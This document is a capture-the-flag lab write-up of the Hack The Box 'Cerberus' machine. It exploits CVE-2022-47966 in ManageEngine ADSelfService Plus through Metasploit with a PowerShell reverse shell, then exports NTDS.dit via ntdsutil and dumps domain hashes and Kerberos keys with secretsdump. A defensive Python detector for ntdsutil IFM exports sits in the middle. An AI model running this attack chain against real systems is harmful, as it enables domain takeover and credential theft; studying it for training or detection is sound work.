CVE-2022-47966


A vulnerability classified as problematic was found in Zoho ManageEngine Access Manager Plus, Active Directory 360, ADAudit Plus, ADManager Plus, ADSelfService Plus, Analytics Plus, Application Control Plus, Asset Explorer, Browser Security Plus, Device Control Plus, Endpoint Central, Endpoint Central MSP, Endpoint DLP, Key Manager Plus, OS Deployer, PAM 360, Password Manager Pro, Patch Manager Plus, Remote Access Plus, Remote Monitoring and Management, ServiceDesk Plus, ServiceDesk Plus MSP, SupportCenter Plus and Vulnerability Manager Plus (Access Management Software). The affected code is an unknown part of the component Apache xmlsec. The impact is on confidentiality, integrity, and availability.

ADSelfService Plus build 6210 is affected.

The vulnerability has been actively exploited in the wild, and CISA has been officially tracking it.

Exploit


The exploit is available as a Metasploit module.

Additionally, I have come to the conclusion that the original PoC DID NOT work, after hours of trial and error.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ msfconsole -q
 
msf6 > search ADSelfService Plus SAML
 
Matching Modules
================
 
   #  Name                                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966  2023-01-10       excellent  Yes    ManageEngine ADSelfService Plus Unauthenticated SAML RCE
 
 
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
 
msf6 > use 0
[*] Using configured payload cmd/windows/powershell/meterpreter/reverse_tcp

That's the one: exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966. There are a few options to set:

  • guid: 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
    • identified in both the SAMLRequest and the SAMLResponse
  • issuer_url: http://dc.cerberus.local/adfs/services/trust
    • identified in the SAMLResponse
  • proxies: socks5:127.0.0.1:48823
  • rhosts: 10.10.11.205
  • lhost: tun0

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
GUID => 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set issuer_url http://dc.cerberus.local/adfs/services/trust
issuer_url => http://dc.cerberus.local/adfs/services/trust
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set proxies socks5:127.0.0.1:48823
proxies => socks5:127.0.0.1:48823
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set RHOSTS 10.10.11.205
RHOSTS => 10.10.11.205
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set LHOST tun0
LHOST => tun0

Configuring accordingly

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp

I will also change the payload to a cmd.exe-based one.

All Set

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run
 
[-] exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
[*] Exploit completed, but no session was created.

The initial run fails because, by default, a TCP connect-back payload is not allowed when a proxy (here the SOCKS5 proxy) is configured.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > set ReverseAllowProxy true
ReverseAllowProxy => true

This can be overridden with the following command: set ReverseAllowProxy true

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run
 
[*] started reverse tcp handler on 10.10.14.4:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] powershell session session 1 opened (10.10.14.4:4444 -> 10.10.11.205:56337) at 2024-01-18 14:49:46 +0100
 
ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> whoami
nt authority\system
ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> hostname
DC
ps c:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin> ipconfig 
 
Windows IP Configuration
 
 
ethernet adapter vethernet (switch1):
 
   connection-specific dns suffix  . : 
   link-local ipv6 address . . . . . : fe80::e225:edaa:5112:dfc3%6
   ipv4 address. . . . . . . . . . . : 172.16.22.1
   subnet mask . . . . . . . . . . . : 255.255.255.240
   default gateway . . . . . . . . . : 
 
ethernet adapter ethernet0 3:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::138
   ipv6 address. . . . . . . . . . . : dead:beef::5da5:9378:505:b275
   link-local ipv6 address . . . . . : fe80::75bd:2eb2:491:40c1%5
   ipv4 address. . . . . . . . . . . : 10.10.11.205
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%5
                                       10.10.10.2

Success. System-level compromise.

Hashdump


PS C:\tmp> powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp
Creating snapshot...
Snapshot set {f79a9d1a-c034-46ab-a505-80a7e095d819} generated successfully.
Snapshot {e6daecab-b29b-4b84-b5b3-3b3570a1279a} mounted as C:\$SNAP_202401180740_VOLUMEC$\
Snapshot {e6daecab-b29b-4b84-b5b3-3b3570a1279a} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202401180740_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\temp\Active Directory\ntds.dit
 
                  Defragmentation  Status (omplete)
 
          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................
 
Copying registry files...
Copying c:\temp\registry\SYSTEM
Copying c:\temp\registry\SECURITY
Snapshot {e6daecab-b29b-4b84-b5b3-3b3570a1279a} unmounted.
IFM media created successfully in c:\temp
ifm: q
C:\Windows\system32\ntdsutil.exe: q

Dumping LSA secrets with the LOLBAS method via ntdsutil.exe
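From the defender's side, the ntdsutil IFM export above is a well-known LOLBAS pattern that process-creation telemetry should catch. The following is an added example, not part of the original writeup: it scans constructed process-creation records (Security 4688 / Sysmon EID 1 style, flattened here to '|'-separated key=value lines and made up for this example) for the ifm + create full pattern in both its abbreviated and fully spelled-out verb forms, while ignoring routine ntdsutil use such as metadata cleanup.

```python
import re
from typing import Dict, List, Optional

# Constructed sample events (not real telemetry from the lab host): process-creation
# records in the style of Security 4688 / Sysmon EID 1, flattened to '|'-separated key=value.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\ntdsutil.exe|CommandLine=ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|User=NT AUTHORITY\SYSTEM",
    r'Image=C:\Windows\System32\ntdsutil.exe|CommandLine=NTDSUTIL "activate instance ntds" ifm "create sysvol full C:\backup" quit quit|ParentImage=C:\Windows\System32\cmd.exe|User=CERBERUS\backupsvc',
    r'Image=C:\Windows\System32\ntdsutil.exe|CommandLine=ntdsutil.exe "metadata cleanup" q q|ParentImage=C:\Windows\System32\cmd.exe|User=CERBERUS\admin',
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell Compress-Archive -Path C:\temp -DestinationPath .\archive.zip|ParentImage=C:\Windows\System32\cmd.exe|User=NT AUTHORITY\SYSTEM",
]

# ntdsutil accepts abbreviated or full verbs, quoted or bare, in any letter case.
IFM_CREATE = re.compile(r"\bifm\b.*\bcreate\b(?:\s+sysvol)?\s+full\b")
ACTIVATE = re.compile(r"\b(?:ac|act|activate)\s+(?:i|inst|instance)\s+ntds\b")

def parse_event(line: str) -> Dict[str, str]:
    """Split a '|'-delimited key=value event line into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]

def normalize_cmdline(cmd: str) -> str:
    """Drop quoting, collapse whitespace and lower-case so verb matching is robust."""
    return re.sub(r"\s+", " ", cmd.replace('"', " ").replace("'", " ")).strip().lower()

def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a finding for an IFM export of NTDS.dit, or None for anything else."""
    image = basename(event.get("Image", "")).lower()
    cmd = normalize_cmdline(event.get("CommandLine", ""))
    if image != "ntdsutil.exe" and "ntdsutil" not in cmd:
        return None
    if not IFM_CREATE.search(cmd):
        return None  # other ntdsutil use (e.g. metadata cleanup) is routine admin work
    detail = "ntdsutil IFM export (NTDS.dit + SYSTEM/SECURITY hives)"
    if ACTIVATE.search(cmd):
        detail += ", instance explicitly activated"
    return f"{detail} by {event.get('User', '?')} via {basename(event.get('ParentImage', '?'))}"

def scan(lines: List[str]) -> List[str]:
    """Run classify() over raw event lines and return the alert strings."""
    return [f for f in (classify(parse_event(l)) for l in lines) if f]
```

scan(SAMPLE_EVENTS) returns two alerts (the PowerShell-wrapped abbreviated form and the fully spelled-out form) and nothing for the metadata-cleanup or Compress-Archive events.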

PS C:\tmp> Compress-Archive -Path C:\temp -DestinationPath .\archive.zip
PS C:\tmp> download C:\\tmp\\archive.zip ./archive.zip
[*] Download C:\tmp\archive.zip => ./archive.zip
[+] Done

Transferring the archive to Kali

┌──(kali㉿kali)-[~/…/labs/cerberus/CVE-2022-47966/LSA]
└─$ unzip archive.zip          
Archive:  archive.zip
warning:  archive.zip appears to use backslashes as path separators
  inflating: temp/Active Directory/ntds.dit  
  inflating: temp/Active Directory/ntds.jfm  
  inflating: temp/registry/SECURITY  
  inflating: temp/registry/SYSTEM    

Inflating

┌──(kali㉿kali)-[~/…/labs/cerberus/CVE-2022-47966/LSA]
└─$ impacket-secretsdump local -ntds temp/Active\ Directory/ntds.dit -system temp/registry/SYSTEM -security temp/registry/SECURITY  1
Impacket v0.12.0.dev1+20231130.165011.d370e63 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0xad7915b8e6d4f9ee383a5176349739e3
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:a25fb7291307abe5bc8ea71a5d26bcfe6c7871d66e6fec0adbaedea580b3b55938ce2a4d1bd4dafeb9400afb24a3b8b3d94d2f02e128f1826afb6669aa0fa9e4bc3b2a09787365030c39ee3fc491e5a28f4e890fc8c86dbb526f356b556b7d2c0f52506617b98aa7383ea800e078568130f757d9581eddad362e06777bc12d0ba70215b9e4d30fceb6a9489b42cec4324069386c743acdd81ecfd1d55587055c5c39c2aa21dd5cd0f9f2d1f1be0b70765bedbe8c966770234646c8a2047aff5ea313ac55a71833ea8f2ec749d826369044766c05bd1283e0f99439098c6c911590c76b015963102fe47bf8d928940400
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:811855bb4d66867881d93baf9460c8f1
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xee3ee8172d485d91d928e75a6199a2d9d1552d2a
dpapi_userkey:0x872350e7691cd1f10c04962e21f42f7921a64796
[*] NL$KM 
 0000   4D 9A AB A3 5A 7A 2F 50  25 FC 83 1A 10 FE 1E A5   M...Zz/P%.......
 0010   D3 B9 9D A8 B5 4E EB 60  2B D6 78 53 7B 73 2A E0   .....N.`+.xS{s*.
 0020   44 A8 77 0C 48 36 37 26  80 D0 2C 90 D4 16 AA E5   D.w.H67&..,.....
 0030   66 53 4B 7F A9 2D 50 99  8A 26 0A 20 40 0D 9B E1   fSK..-P..&. @...
NL$KM:4d9aaba35a7a2f5025fc831a10fe1ea5d3b99da8b54eeb602bd678537b732ae044a8770c4836372680d02c90d416aae566534b7fa92d50998a260a20400d9be1
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: caf4762be59b79e7f2a74756cb1a11fe
[*] Reading and decrypting hashes from temp/Active Directory/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:811855bb4d66867881d93baf9460c8f1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d2e82d4f77310a49973793ee986b6490:::
cerberus.local\matthew:1104:aad3b435b51404eeaad3b435b51404ee:bcd285980e1d9b302e16875844ef6977:::
adfs_svc$:5602:aad3b435b51404eeaad3b435b51404ee:c6c1d3757fb38790d16e9678f474a295:::
ICINGA$:9102:aad3b435b51404eeaad3b435b51404ee:af70cf6b33f1cce788138d459f676faf:::
[*] Kerberos keys from temp/Active Directory/ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:70a856da8ada6efe4fdec36b26b2b29869aaf4829d049db5de56a1e30f47aa58
Administrator:aes128-cts-hmac-sha1-96:7a84f5d0f21a4752b09642bd79202721
Administrator:des-cbc-md5:9eef4fb597d93419
DC$:aes256-cts-hmac-sha1-96:6633a17b72a964b119ab22ed482ade0fe6a828c4a64cb11deb11f5838e00746a
DC$:aes128-cts-hmac-sha1-96:186c9eb1ec9e8a12fa7c5a81c3feb632
DC$:des-cbc-md5:6bc1c762c4a7a126
krbtgt:aes256-cts-hmac-sha1-96:afca4e9993e4015f8c3acb6d481375213ae34779181028f049ce1005bab5bebc
krbtgt:aes128-cts-hmac-sha1-96:6bdcee151a166edcd3bbb9b67bf5dd63
krbtgt:des-cbc-md5:79267ce9a45d4546
cerberus.local\matthew:aes256-cts-hmac-sha1-96:5d71167dd6247cc3032c35bceda41f5c5783d3f3df94a43d933221cf4149cd8f
cerberus.local\matthew:aes128-cts-hmac-sha1-96:b5abf06c48f0bb78814cfc9bcbcdeed8
cerberus.local\matthew:des-cbc-md5:76c78092b6aee649
adfs_svc$:aes256-cts-hmac-sha1-96:7ee49afad92c71eed6f66c2a7a17080a7a1f69483b41cd44e77bac5205047701
adfs_svc$:aes128-cts-hmac-sha1-96:50f6f266698a03c1d27fa4be43f8a7f2
adfs_svc$:des-cbc-md5:76c151a4e062e6a8
ICINGA$:aes256-cts-hmac-sha1-96:38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f
ICINGA$:aes128-cts-hmac-sha1-96:1241a65425ce5c7a0f06be09e8217274
ICINGA$:des-cbc-md5:0858ad94ef67b916
[*] Cleaning up... 

Domain Level Compromise